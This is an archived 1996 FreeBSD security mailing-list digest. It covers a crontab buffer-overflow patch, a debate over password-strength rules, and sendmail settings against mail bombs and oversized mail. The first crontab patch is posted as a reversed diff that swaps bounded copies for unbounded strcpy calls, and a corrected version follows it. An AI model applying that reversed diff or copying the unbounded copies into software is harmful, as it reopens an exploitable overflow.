From owner-freebsd-security Sun Dec 15 02:17:40 1996 Return-Path: Received: (from root@localhost) by freefall.freebsd.org (8.8.4/8.8.4) id CAA14545 for security-outgoing; Sun, 15 Dec 1996 02:17:40 -0800 (PST) Received: from zibbi.mikom.csir.co.za (zibbi.mikom.csir.co.za [146.64.24.58]) by freefall.freebsd.org (8.8.4/8.8.4) with ESMTP id CAA14528 for ; Sun, 15 Dec 1996 02:17:26 -0800 (PST) Received: (from jtonsing@localhost) by zibbi.mikom.csir.co.za (8.8.3/8.8.3) id MAA09130; Sun, 15 Dec 1996 12:17:16 +0200 (SAT) From: Johann Tonsing Message-Id: <199612151017.MAA09130@zibbi.mikom.csir.co.za> Subject: crontab buffer overflow fix To: freebsd-security@freebsd.org Date: Sun, 15 Dec 1996 12:17:16 +0200 (SAT) Cc: jhay@zibbi.mikom.csir.co.za (John Hay), roelof@cube.nanoteq.co.za (Roelof Temmingh) X-Mailer: ELM [version 2.4ME+ PL24 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk Hi! Here's a fix for the crontab buffer overflow problem. The Filename[] overflow seems to be the actual problem, but I've fixed a potential problem with User[] as well. (Not trusting the output of getpwuid() might be *too* paranoid though!) JT -- jtonsing@mikom.csir.co.za, Voice: +27 82 569-2323, Fax/Ans: +27 12 43-5643, S-mail: 173 Duxbury Rd, Hatfield, 0083 Pretoria, South Africa. PGP public key: ftp://skeleton.mikom.csir.co.za/pub/netsec.pgp/jtonsing.pub Send anonymous mail to jt-anon@zibbi.mikom.csir.co.za (no reply possible) *************************************************************************** --- crontab.c Sun Dec 15 12:00:41 1996 +++ crontab.c.old Thu May 2 14:57:40 1996 @@ -144,8 +144,7 @@ fprintf(stderr, "bailing out.\n"); exit(ERROR_EXIT); } - strncpy(User, pw->pw_name, sizeof(User)-1); - User[sizeof(User)-1] = '\0'; + strcpy(User, pw->pw_name); strcpy(RealUser, User); Filename[0] = '\0'; Option = opt_unknown; @@ -168,8 +167,7 @@ ProgramName, optarg); exit(ERROR_EXIT); } - strncpy(User, optarg, sizeof(User)-1); - User[sizeof(User)-1] = '\0'; + (void) strcpy(User, optarg); break; case 'l': if (Option != opt_unknown) @@ -200,8 +198,7 @@ } else { if (argv[optind] != NULL) { Option = opt_replace; - strncpy (Filename, argv[optind], sizeof(Filename)-1); - Filename[sizeof(Filename)-1] = '\0'; + (void) strcpy (Filename, argv[optind]); } else { usage("file name must be specified for replace"); } From owner-freebsd-security Sun Dec 15 02:30:19 1996 Return-Path: Received: (from root@localhost) by freefall.freebsd.org (8.8.4/8.8.4) id CAA15642 for security-outgoing; Sun, 15 Dec 1996 02:30:19 -0800 (PST) Received: from zibbi.mikom.csir.co.za (zibbi.mikom.csir.co.za [146.64.24.58]) by freefall.freebsd.org (8.8.4/8.8.4) with ESMTP id CAA15637 for ; Sun, 15 Dec 1996 02:30:15 -0800 (PST) Received: (from jtonsing@localhost) by zibbi.mikom.csir.co.za (8.8.3/8.8.3) id MAA09448; Sun, 15 Dec 1996 12:30:12 +0200 (SAT) From: Johann Tonsing Message-Id: <199612151030.MAA09448@zibbi.mikom.csir.co.za> Subject: crontab buffer overflow - corrected patch To: freebsd-security@freebsd.org Date: Sun, 15 Dec 1996 12:30:12 +0200 (SAT) Cc: jhay@zibbi.mikom.csir.co.za (John Hay), roelof@cube.nanoteq.co.za (Roelof Temmingh) X-Mailer: ELM [version 2.4ME+ PL24 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk Hi again! I've just been informed that one should use diff -c oldfile newfile or diff -u oldfile newfile when submitting patches. Here's the same patch again in that format. JT -- jtonsing@mikom.csir.co.za, Voice: +27 82 569-2323, Fax/Ans: +27 12 43-5643, S-mail: 173 Duxbury Rd, Hatfield, 0083 Pretoria, South Africa. PGP public key: ftp://skeleton.mikom.csir.co.za/pub/netsec.pgp/jtonsing.pub Send anonymous mail to jt-anon@zibbi.mikom.csir.co.za (no reply possible) *************************************************************************** --- ../old/crontab.c Thu May 2 14:57:40 1996 +++ crontab.c Sun Dec 15 12:00:41 1996 @@ -144,7 +144,8 @@ fprintf(stderr, "bailing out.\n"); exit(ERROR_EXIT); } - strcpy(User, pw->pw_name); + strncpy(User, pw->pw_name, sizeof(User)-1); + User[sizeof(User)-1] = '\0'; strcpy(RealUser, User); Filename[0] = '\0'; Option = opt_unknown; @@ -167,7 +168,8 @@ ProgramName, optarg); exit(ERROR_EXIT); } - (void) strcpy(User, optarg); + strncpy(User, optarg, sizeof(User)-1); + User[sizeof(User)-1] = '\0'; break; case 'l': if (Option != opt_unknown) @@ -198,7 +200,8 @@ } else { if (argv[optind] != NULL) { Option = opt_replace; - (void) strcpy (Filename, argv[optind]); + strncpy (Filename, argv[optind], sizeof(Filename)-1); + Filename[sizeof(Filename)-1] = '\0'; } else { usage("file name must be specified for replace"); } From owner-freebsd-security Sun Dec 15 05:21:15 1996 Return-Path: Received: (from root@localhost) by freefall.freebsd.org (8.8.4/8.8.4) id FAA25232 for security-outgoing; Sun, 15 Dec 1996 05:21:15 -0800 (PST) Received: from isbalham.ist.co.uk (isbalham.ist.co.uk [192.31.26.1]) by freefall.freebsd.org (8.8.4/8.8.4) with ESMTP id FAA25152; Sun, 15 Dec 1996 05:19:51 -0800 (PST) Received: from gid.co.uk (uucp@localhost) by isbalham.ist.co.uk (8.8.4/8.8.4) with UUCP id NAA02088; Sun, 15 Dec 1996 13:03:59 GMT Date: Sun, 15 Dec 1996 12:53:42 GMT Received: from [194.32.164.2] by seagoon.gid.co.uk; Sun, 15 Dec 1996 12:53:42 GMT X-Sender: rb@194.32.164.1 Message-Id: Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" To: Terry Lambert , proff@iq.org (Julian Assange) From: rb@gid.co.uk (Bob Bishop) Subject: Re: vulnerability in new pw suite Cc: security@freebsd.org, hackers@freebsd.org Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk At 2:23 pm 14/12/96, Terry Lambert wrote: >I've noticed a similar restriction on the search space is caused by >enforcing password length and use of particular values (digits, >control characters, and capitalization) > >Once we add in "non-pronouncible" and "not in dictionary" and so on, >I think that eventually, in the interests of "security", users will >be forced to choose from a list of 10 or so "sufficiently safe" >passwords. > >Of course, once that happens, we'll just publish the list... any >restriction on "allowed values" is an implicit restriction of the >search space a cracker is required to search, and makes cracking >just that much easier. Apologies if my irony detector is malfunctioning, but I can't let this one go :-) There are something over 10^14 usable 8 character passwords. Of these, maybe 10^5 are in dictionaries, and maybe another 100 'guessables' per user could be found easily by trawling the user's home directory and points south. Throw in a few more (SO's name, phone number and the like) and maybe you can get up to c. 2 x 10^5 passwords per user that are unsafe. That still leaves comfortably over 10^14 comparatively safe 8 character passwords. So there isn't actually a problem, it's just that those pesky users will insist on picking passwords from the unsafe set. They use lame excuses like "I cant remember %bSx48&J". Insisting on one non-alphanumeric character reduces the total search space right enough, to between 10^13 and 10^14, but it almost certainly forces the password out of the much smaller unsafe set. You can introduce a few such restrictions before the total search space falls below 10^12 which is probably good enough. At least, it's *much* better than 10^5. -- Bob Bishop (0118) 977 4017 international code +44 118 rb@gid.co.uk fax (0118) 989 4254 between 0800 and 1800 UK From owner-freebsd-security Sun Dec 15 07:18:27 1996 Return-Path: Received: (from root@localhost) by freefall.freebsd.org (8.8.4/8.8.4) id HAA04966 for security-outgoing; Sun, 15 Dec 1996 07:18:27 -0800 (PST) Received: from ns.cs.hku.hk (ns.cs.hku.hk [147.8.178.10]) by freefall.freebsd.org (8.8.4/8.8.4) with SMTP id HAA04960 for ; Sun, 15 Dec 1996 07:18:22 -0800 (PST) Received: from champion (champion.cs.hku.hk) by ns.cs.hku.hk with SMTP id AA27972 (5.67b/IDA-1.5 for ) Sun, 15 Dec 1996 23:17:47 +0800 Received: by champion (4.1/S2.0-sunos4) id AA16073; Sun, 15 Dec 96 23:17:34 HKT Date: Sun, 15 Dec 1996 23:17:33 +0800 (HKT) From: Doug Kwan ~{9XUq5B~} To: security@freebsd.org Subject: mail bomb! Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk Hi all, We are a small ISP in Hong Kong. Our machines run both Linux and FreeBSD. Recently we found that an ex-user of ours wanted to revenge. That stupid kid grabbed a programme call kaboom! from the net and sent fake mails to all our user saying the our servers will be down for 6 days for maintenance. Needless to say, we receives many complaints from our users. What's more the damned kid send the very same message several time. We spent hours cleaning other users mail box. For the time being we had no solution to this except setting our routers to filter our packets from the relaying host used by that sucker. Has anyone on the list had similar experience? What could we do against this? I know filtering mails would be next to impossible. How about reject fake mails? We are running and ESMTP mail server and it logs all incoming IP's in the mails delivered. Is there anyway to reject mails with sending addresses in our domain but comming from outside? Any comment and suggest will be highly appreciate. Thanks -Doug Kwan From owner-freebsd-security Sun Dec 15 07:50:33 1996 Return-Path: Received: (from root@localhost) by freefall.freebsd.org (8.8.4/8.8.4) id HAA09405 for security-outgoing; Sun, 15 Dec 1996 07:50:33 -0800 (PST) Received: from passer.osg.gov.bc.ca (0@passer.osg.gov.bc.ca [142.32.110.29]) by freefall.freebsd.org (8.8.4/8.8.4) with ESMTP id HAA09396 for ; Sun, 15 Dec 1996 07:50:31 -0800 (PST) Received: from localhost (15005@localhost [127.0.0.1]) by passer.osg.gov.bc.ca (8.8.4/8.6.10) with SMTP id HAA14407; Sun, 15 Dec 1996 07:50:23 -0800 (PST) From: Cy Schubert - ITSD Open Systems Group Message-Id: <199612151550.HAA14407@passer.osg.gov.bc.ca> X-Authentication-Warning: passer.osg.gov.bc.ca: 15005@localhost [127.0.0.1] didn't use HELO protocol Reply-to: cschuber@uumail.gov.bc.ca X-Mailer: MH X-Sender: cschuber To: Doug Kwan ~{9XUq5B~} cc: security@freebsd.org Subject: Re: mail bomb! In-reply-to: Your message of "Sun, 15 Dec 96 23:17:33 +0800." Date: Sun, 15 Dec 96 07:50:23 -0800 X-Mts: smtp Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk I've used the following to ban known advertisers to my desktop Alpha at work. Someone had posted it on BUGTRAQ about six months ago and unfurtunately I cannot remember his name. Put the following in your sendmail.cf. . . . # FK /etc/banned.domains CK banned.domain1 ... banned.domainN # FX /etc/banned.users CX banned.user1 ... banned.userN . . . S98 R$* < @$*$=K . > $* $#error $@ 5.7.1 $: "This domain is banned" R$* < @$*$=K > $* $#error $@ 5.7.1 $: "This domain is banned" R$*$=X < @$* . > $* $#error $@ 5.7.1 $: "This user is banned" R$*$=X < @$* > $* $#error $@ 5.7.1 $: "This user is banned" . . . Regards, Phone: (250)387-8437 Cy Schubert OV/VM: BCSC02(CSCHUBER) Open Systems Support BITNET: CSCHUBER@BCSC02.BITNET ITSD Internet: cschuber@uumail.gov.bc.ca cschuber@bcsc02.gov.bc.ca "Quit spooling around, JES do it." > Hi all, > > We are a small ISP in Hong Kong. Our machines run both Linux > and FreeBSD. Recently we found that an ex-user of ours wanted to revenge. > That stupid kid grabbed a programme call kaboom! from the net and sent > fake mails to all our user saying the our servers will be down for 6 days > for maintenance. Needless to say, we receives many complaints from our > users. What's more the damned kid send the very same message several time. > We spent hours cleaning other users mail box. For the time being we had > no solution to this except setting our routers to filter our packets from > the relaying host used by that sucker. > > Has anyone on the list had similar experience? What could we do > against this? I know filtering mails would be next to impossible. How > about reject fake mails? We are running and ESMTP mail server and it > logs all incoming IP's in the mails delivered. Is there anyway to > reject mails with sending addresses in our domain but comming from outside? > > Any comment and suggest will be highly appreciate. > > Thanks > > -Doug Kwan > From owner-freebsd-security Sun Dec 15 08:16:06 1996 Return-Path: Received: (from root@localhost) by freefall.freebsd.org (8.8.4/8.8.4) id IAA12373 for security-outgoing; Sun, 15 Dec 1996 08:16:06 -0800 (PST) Received: from alur1.alurtenaga.com.my (alur1.alurtenaga.com.my [161.142.254.14]) by freefall.freebsd.org (8.8.4/8.8.4) with SMTP id IAA12310 for ; Sun, 15 Dec 1996 08:15:53 -0800 (PST) Received: from sting.alurtenaga.com.my (lre_usr1.alurtenaga.com.my [192.228.211.221]) by alur1.alurtenaga.com.my (8.6.12/8.6.12) with SMTP id XAA26592 for ; Sun, 15 Dec 1996 23:57:15 GMT Received: by sting.alurtenaga.com.my with Microsoft Mail id <01BBEAE4.60915180@sting.alurtenaga.com.my>; Mon, 16 Dec 1996 00:02:07 +-800 Message-ID: <01BBEAE4.60915180@sting.alurtenaga.com.my> From: Ahmad Lokman To: "'security@freebsd.org'" Subject: How to limit the size of the email from outside Date: Mon, 16 Dec 1996 00:02:06 +-800 MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 8bit X-MIME-Autoconverted: from quoted-printable to 8bit by freefall.freebsd.org id IAA12330 Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk Here I would like to know if anyone out there know how to prevent someone sending a large file of email to an email server. This will prevent the guy from jamming the server. Please give me any suggestion on this matter.. regards, alhh From owner-freebsd-security Sun Dec 15 08:48:47 1996 Return-Path: Received: (from root@localhost) by freefall.freebsd.org (8.8.4/8.8.4) id IAA14598 for security-outgoing; Sun, 15 Dec 1996 08:48:47 -0800 (PST) Received: from passer.osg.gov.bc.ca (0@passer.osg.gov.bc.ca [142.32.110.29]) by freefall.freebsd.org (8.8.4/8.8.4) with ESMTP id IAA14593 for ; Sun, 15 Dec 1996 08:48:44 -0800 (PST) Received: from localhost (15005@localhost [127.0.0.1]) by passer.osg.gov.bc.ca (8.8.4/8.6.10) with SMTP id IAA14854; Sun, 15 Dec 1996 08:48:25 -0800 (PST) From: Cy Schubert - ITSD Open Systems Group Message-Id: <199612151648.IAA14854@passer.osg.gov.bc.ca> X-Authentication-Warning: passer.osg.gov.bc.ca: 15005@localhost [127.0.0.1] didn't use HELO protocol Reply-to: cschuber@uumail.gov.bc.ca X-Mailer: MH X-Sender: cschuber To: Ahmad Lokman cc: "'security@freebsd.org'" Subject: Re: How to limit the size of the email from outside In-reply-to: Your message of "Mon, 16 Dec 96 00:02:06." <01BBEAE4.60915180@sting.alurtenaga.com.my> Date: Sun, 15 Dec 96 08:48:24 -0800 X-Mts: smtp Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk > Here I would like to know if anyone out there know how to prevent someone > sending a large file of email to an email server. This will prevent the > guy from jamming the server. Please give me any suggestion on this matter.. Try Maxsize in your Mlocal and Mprog statements. This is what I use on my DEC Alpha desktop at work. Mlocal, P=/bin/mail, F=lsDFMrmn, S=10, R=20/40, Maxsize=1000000, A=mail -d $u Mprog, P=/usr/local/sendmail/smrsh, F=lsDFMeu, S=10, R=20/40, D=$z:/, Maxsize=1000000, A=sh -c $u This limits incoming mail processed by by smrsh and /bin/mail to 1 million bytes. You can do the same with the Mstmp, Mesmtp, and Mrelay statements to limit the size of outgoing mail as well. Regards, Phone: (250)387-8437 Cy Schubert OV/VM: BCSC02(CSCHUBER) Open Systems Support BITNET: CSCHUBER@BCSC02.BITNET ITSD Internet: cschuber@uumail.gov.bc.ca cschuber@bcsc02.gov.bc.ca "Quit spooling around, JES do it." From owner-freebsd-security Sun Dec 15 12:46:27 1996 Return-Path: Received: (from root@localhost) by freefall.freebsd.org (8.8.4/8.8.4) id MAA27986 for security-outgoing; Sun, 15 Dec 1996 12:46:27 -0800 (PST) Received: from mexico.brainstorm.eu.org (root@mexico.brainstorm.fr [193.56.58.253]) by freefall.freebsd.org (8.8.4/8.8.4) with ESMTP id MAA27980 for ; Sun, 15 Dec 1996 12:46:22 -0800 (PST) Received: from brasil.brainstorm.eu.org (brasil.brainstorm.fr [193.56.58.33]) by mexico.brainstorm.eu.org (8.7.5/8.7.3) with ESMTP id VAA29963 for ; Sun, 15 Dec 1996 21:46:16 +0100 Received: (from uucp@localhost) by brasil.brainstorm.eu.org (8.6.12/8.6.12) with UUCP id VAA11001 for security@FreeBSD.org; Sun, 15 Dec 1996 21:46:12 +0100 Received: (from roberto@localhost) by keltia.freenix.fr (8.8.4/keltia-uucp-2.9) id VAA06337; Sun, 15 Dec 1996 21:43:18 +0100 (CET) Message-ID: Date: Sun, 15 Dec 1996 21:43:18 +0100 From: roberto@keltia.freenix.fr (Ollivier Robert) To: security@FreeBSD.org Subject: Re: mail bomb! References: <199612151550.HAA14407@passer.osg.gov.bc.ca> X-Mailer: Mutt 0.54 Mime-Version: 1.0 X-Operating-System: FreeBSD 3.0-CURRENT ctm#2768 In-Reply-To: <199612151550.HAA14407@passer.osg.gov.bc.ca>; from Cy Schubert - ITSD Open Systems Group on Dec 15, 1996 07:50:23 -0800 Sender: owner-security@FreeBSD.org X-Loop: FreeBSD.org Precedence: bulk According to Cy Schubert - ITSD Open Systems Group: > I've used the following to ban known advertisers to my desktop Alpha > at work. Someone had posted it on BUGTRAQ about six months ago and > unfurtunately I cannot remember his name. 8.8.4 has also the check_compat rules to filter mails. It doesn't appear to be really documented... -- Ollivier ROBERT -=- The daemon is FREE! -=- roberto@keltia.freenix.fr FreeBSD keltia.freenix.fr 3.0-CURRENT #31: Tue Dec 3 23:52:58 CET 1996 From owner-freebsd-security Sun Dec 15 12:46:30 1996 Return-Path: Received: (from root@localhost) by freefall.freebsd.org (8.8.4/8.8.4) id MAA27997 for security-outgoing; Sun, 15 Dec 1996 12:46:30 -0800 (PST) Received: from mexico.brainstorm.eu.org (root@mexico.brainstorm.fr [193.56.58.253]) by freefall.freebsd.org (8.8.4/8.8.4) with ESMTP id MAA27985 for ; Sun, 15 Dec 1996 12:46:27 -0800 (PST) Received: from brasil.brainstorm.eu.org (brasil.brainstorm.fr [193.56.58.33]) by mexico.brainstorm.eu.org (8.7.5/8.7.3) with ESMTP id VAA29966 for ; Sun, 15 Dec 1996 21:46:17 +0100 Received: (from uucp@localhost) by brasil.brainstorm.eu.org (8.6.12/8.6.12) with UUCP id VAA11000 for security@freebsd.org; Sun, 15 Dec 1996 21:46:11 +0100 Received: (from roberto@localhost) by keltia.freenix.fr (8.8.4/keltia-uucp-2.9) id VAA06325; Sun, 15 Dec 1996 21:41:30 +0100 (CET) Message-ID: Date: Sun, 15 Dec 1996 21:41:29 +0100 From: roberto@keltia.freenix.fr (Ollivier Robert) To: security@FreeBSD.org ('security@freebsd.org') Subject: Re: How to limit the size of the email from outside References: <01BBEAE4.60915180@sting.alurtenaga.com.my> <199612151648.IAA14854@passer.osg.gov.bc.ca> X-Mailer: Mutt 0.54 Mime-Version: 1.0 X-Operating-System: FreeBSD 3.0-CURRENT ctm#2768 In-Reply-To: <199612151648.IAA14854@passer.osg.gov.bc.ca>; from Cy Schubert - ITSD Open Systems Group on Dec 15, 1996 08:48:24 -0800 Sender: owner-security@FreeBSD.org X-Loop: FreeBSD.org Precedence: bulk According to Cy Schubert - ITSD Open Systems Group: > Try Maxsize in your Mlocal and Mprog statements. Easiest way is to put define(`SMTP_MAILER_MAX', 500000)dnl into the whatever.mc configuration file. SMTP_MAILER_MAX [undefined] The maximum size of messages that will be transported using the smtp, smtp8, or esmtp mailers. If the incoming sendmail is ESMTP compatible, then it will send SIZE=nnnn in the MAIL FROM: SMTP dialog. I'm not sure if this work if the incoming sendmail is an old one. There is also confMAX_MESSAGE_SIZE MaxMessageSize [infinite] The maximum size of messages that will be accepted (in bytes). -- Ollivier ROBERT -=- The daemon is FREE! -=- roberto@keltia.freenix.fr FreeBSD keltia.freenix.fr 3.0-CURRENT #31: Tue Dec 3 23:52:58 CET 1996 From owner-freebsd-security Sun Dec 15 13:10:16 1996 Return-Path: Received: (from root@localhost) by freefall.freebsd.org (8.8.4/8.8.4) id NAA00466 for security-outgoing; Sun, 15 Dec 1996 13:10:16 -0800 (PST) Received: from phaeton.artisoft.com (phaeton.Artisoft.COM [198.17.250.211]) by freefall.freebsd.org (8.8.4/8.8.4) with SMTP id NAA00446; Sun, 15 Dec 1996 13:10:11 -0800 (PST) Received: (from terry@localhost) by phaeton.artisoft.com (8.6.11/8.6.9) id NAA23837; Sun, 15 Dec 1996 13:39:04 -0700 From: Terry Lambert Message-Id: <199612152039.NAA23837@phaeton.artisoft.com> Subject: Re: vulnerability in new pw suite To: rb@gid.co.uk (Bob Bishop) Date: Sun, 15 Dec 1996 13:39:04 -0700 (MST) Cc: terry@lambert.org, proff@iq.org, security@freebsd.org, hackers@freebsd.org In-Reply-To: from "Bob Bishop" at Dec 15, 96 12:53:42 pm X-Mailer: ELM [version 2.4 PL24] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk > There are something over 10^14 usable 8 character passwords. Of these, > maybe 10^5 are in dictionaries, and maybe another 100 'guessables' per user > could be found easily by trawling the user's home directory and points > south. Throw in a few more (SO's name, phone number and the like) and maybe > you can get up to c. 2 x 10^5 passwords per user that are unsafe. That > still leaves comfortably over 10^14 comparatively safe 8 character > passwords. > > So there isn't actually a problem, it's just that those pesky users will > insist on picking passwords from the unsafe set. They use lame excuses like > "I cant remember %bSx48&J". Heh. Please define "unsafe" in the context of a functional (inaccessible for pre-salt-based attacks) shadow password system. 8-) 8-). I'm tired of having passwd not let me use whatever password I want, considering that with a shadow file, the user will have to brute-force it through /bin/login or equivalent. It seems the harder it becomes to see my post-encryption password, the more anal the passwd command becomes about making post-encryption passwords "safe" from attacks which are impossible to institute unless root has been compromised. Just my opinion about anal passwd programs... Regards, Terry Lambert terry@lambert.org --- Any opinions in this posting are my own and not those of my present or previous employers. From owner-freebsd-security Sun Dec 15 13:43:07 1996 Return-Path: Received: (from root@localhost) by freefall.freebsd.org (8.8.4/8.8.4) id NAA02225 for security-outgoing; Sun, 15 Dec 1996 13:43:07 -0800 (PST) Received: from dfw.dfw.net (aleph1@[198.175.15.10]) by freefall.freebsd.org (8.8.4/8.8.4) with SMTP id NAA02187; Sun, 15 Dec 1996 13:43:00 -0800 (PST) Received: from localhost by dfw.dfw.net (4.1/SMI-4.1) id AA19213; Sun, 15 Dec 96 15:40:44 CST Date: Sun, 15 Dec 1996 15:40:43 -0600 (CST) From: Aleph One To: Terry Lambert Cc: Bob Bishop , proff@iq.org, security@FreeBSD.ORG, hackers@FreeBSD.ORG Subject: Re: vulnerability in new pw suite In-Reply-To: <199612152039.NAA23837@phaeton.artisoft.com> Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk On Sun, 15 Dec 1996, Terry Lambert wrote: > I'm tired of having passwd not let me use whatever password I want, > considering that with a shadow file, the user will have to brute-force > it through /bin/login or equivalent. It seems the harder it becomes to > see my post-encryption password, the more anal the passwd command > becomes about making post-encryption passwords "safe" from attacks > which are impossible to institute unless root has been compromised. Just because the passwd is shadowed does not mean it wont be cracked. The are programs that will brute force passwords using POP, TELNET, RSH, etc. > > Regards, > Terry Lambert > terry@lambert.org > --- > Any opinions in this posting are my own and not those of my present > or previous employers. > Aleph One / aleph1@dfw.net http://underground.org/ KeyID 1024/948FD6B5 Fingerprint EE C9 E8 AA CB AF 09 61 8C 39 EA 47 A8 6A B8 01 From owner-freebsd-security Sun Dec 15 13:56:42 1996 Return-Path: Received: (from root@localhost) by freefall.freebsd.org (8.8.4/8.8.4) id NAA03939 for security-outgoing; Sun, 15 Dec 1996 13:56:42 -0800 (PST) Received: from sol.acs.uwosh.edu (newsol.acs.uwosh.edu [141.233.143.1]) by freefall.freebsd.org (8.8.4/8.8.4) with SMTP id NAA03930 for ; Sun, 15 Dec 1996 13:56:40 -0800 (PST) Received: (qmail 18434 invoked from smtpd); 15 Dec 1996 21:57:24 -0000 Received: from epsilon (HELO epsilon.acs.uwosh.edu) (unknown@141.233.143.33) by smtp.acs.uwosh.edu with SMTP; 15 Dec 1996 21:57:24 -0000 Received: (qmail 20065 invoked by uid 1096); 15 Dec 1996 21:57:25 -0000 Date: Sun, 15 Dec 1996 15:57:24 -0600 (CST) From: "Brian T. Wightman" X-Sender: wightman@epsilon To: security@freebsd.org Subject: Re: vulnerability in new pw suite In-Reply-To: <199612152039.NAA23837@phaeton.artisoft.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk On Sun, 15 Dec 1996, Terry Lambert wrote: > Date: Sun, 15 Dec 1996 13:39:04 -0700 (MST) > From: Terry Lambert > To: Bob Bishop > Cc: terry@lambert.org, proff@iq.org, security@freebsd.org, > hackers@freebsd.org > Subject: Re: vulnerability in new pw suite > > I'm tired of having passwd not let me use whatever password I want, > considering that with a shadow file, the user will have to brute-force > it through /bin/login or equivalent. It seems the harder it becomes to > see my post-encryption password, the more anal the passwd command > becomes about making post-encryption passwords "safe" from attacks > which are impossible to institute unless root has been compromised. > > Just my opinion about anal passwd programs... I have seen arguments made on both sides of this issue. One thing that I can see as a positive of an anal passwd program is that it turns a dictionary attack into a brute force attack. Number of all possible passwords == P Number of words in a dictionary that can be used in a "reasonable" amount of time, and which are denied by the passwd program == D (reasonable needs to be defined here) P - D = p As long as (p >> D), not using an anal password program reduces a brute force attack to a dictionary attack. When D becomes close in size to p, then brute force == dictionary, and the requirements / restrictions gain you nothing. Since people will by nature pick "easy" to remember passwords (words in the dictionary D), if D is small enough to require a cracker to use a brute force attack instead of a dictionary attack, then it is a good thing. When D becomes large enough to frustrate the users and "force" them to post-it-note the passwords, or make a dictionary search about as equal as a brute force attack, then it has gone beyond the goodness factor (in my mind, anyway). A little bit of anality, like not allowing the username, the most common first names, machine names, etc as a password, is probably a good thing. Making it so that (for whatever reason) Fic.He"" becomes a bad password (Fire is cool. Heh Heh Heh) (well, now it is ;) is not a good thing since it introduces other problems with the password system (post-it syndrom, etc). Just my $0.02 Brian From owner-freebsd-security Sun Dec 15 14:46:11 1996 Return-Path: Received: (from root@localhost) by freefall.freebsd.org (8.8.4/8.8.4) id OAA09411 for security-outgoing; Sun, 15 Dec 1996 14:46:11 -0800 (PST) Received: from phaeton.artisoft.com (phaeton.Artisoft.COM [198.17.250.211]) by freefall.freebsd.org (8.8.4/8.8.4) with SMTP id OAA09387; Sun, 15 Dec 1996 14:46:06 -0800 (PST) Received: (from terry@localhost) by phaeton.artisoft.com (8.6.11/8.6.9) id PAA24138; Sun, 15 Dec 1996 15:21:44 -0700 From: Terry Lambert Message-Id: <199612152221.PAA24138@phaeton.artisoft.com> Subject: Re: vulnerability in new pw suite To: aleph1@dfw.net (Aleph One) Date: Sun, 15 Dec 1996 15:21:44 -0700 (MST) Cc: terry@lambert.org, rb@gid.co.uk, proff@iq.org, security@FreeBSD.ORG, hackers@FreeBSD.ORG In-Reply-To: from "Aleph One" at Dec 15, 96 03:40:43 pm X-Mailer: ELM [version 2.4 PL24] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk > Just because the passwd is shadowed does not mean it wont be cracked. The > are programs that will brute force passwords using POP, TELNET, RSH, etc. And as a result will hit source/attempt based security triggers on any real machine, and automatically shut down future attempts until such time as the administrator can deal wit the alerts to the systems satisfaction. Try five failed login attempts to telnet on a Sun machine. It delays (and reports) each failed attempt, and drops the connection (after as huge delay) after the fifth. Regards, Terry Lambert terry@lambert.org --- Any opinions in this posting are my own and not those of my present or previous employers. From owner-freebsd-security Sun Dec 15 15:06:21 1996 Return-Path: Received: (from root@localhost) by freefall.freebsd.org (8.8.4/8.8.4) id PAA12263 for security-outgoing; Sun, 15 Dec 1996 15:06:21 -0800 (PST) Received: from garrison.inetcan.net (dreamer@garrison.inetcan.net [206.186.215.2]) by freefall.freebsd.org (8.8.4/8.8.4) with ESMTP id PAA12252; Sun, 15 Dec 1996 15:06:13 -0800 (PST) Received: (from dreamer@localhost) by garrison.inetcan.net (8.8.4/8.8.4) id RAA10623; Sun, 15 Dec 1996 17:10:04 -0700 Date: Sun, 15 Dec 1996 17:10:04 -0700 (MST) From: Digital Dreamer To: Terry Lambert cc: Bob Bishop , terry@lambert.org, proff@iq.org, security@FreeBSD.ORG, hackers@FreeBSD.ORG Subject: Re: vulnerability in new pw suite In-Reply-To: <199612152039.NAA23837@phaeton.artisoft.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk On Sun, 15 Dec 1996, Terry Lambert wrote: > Heh. > > Please define "unsafe" in the context of a functional (inaccessible for > pre-salt-based attacks) shadow password system. > > 8-) 8-). > > I'm tired of having passwd not let me use whatever password I want, > considering that with a shadow file, the user will have to brute-force > it through /bin/login or equivalent. It seems the harder it becomes to > see my post-encryption password, the more anal the passwd command > becomes about making post-encryption passwords "safe" from attacks > which are impossible to institute unless root has been compromised. > > Just my opinion about anal passwd programs... The idea, from what I understand, is to act as if you don't have shadow passwords, and therefore not rely on them. Security through obscurity and all that. For example, let's say someone breaks root on your machine. Ok, you're in a lot of trouble. But let's attempt to minimize the damage by not giving them 6e12 accounts to log on as in the future when/if they're discovered by handing over the passwords for them on a silver plate. It takes a lot longer to get all your users to change passwords than it takes to fix a backdoored /bin/login. dreamer From owner-freebsd-security Sun Dec 15 15:13:09 1996 Return-Path: Received: (from root@localhost) by freefall.freebsd.org (8.8.4/8.8.4) id PAA12873 for security-outgoing; Sun, 15 Dec 1996 15:13:09 -0800 (PST) Received: from 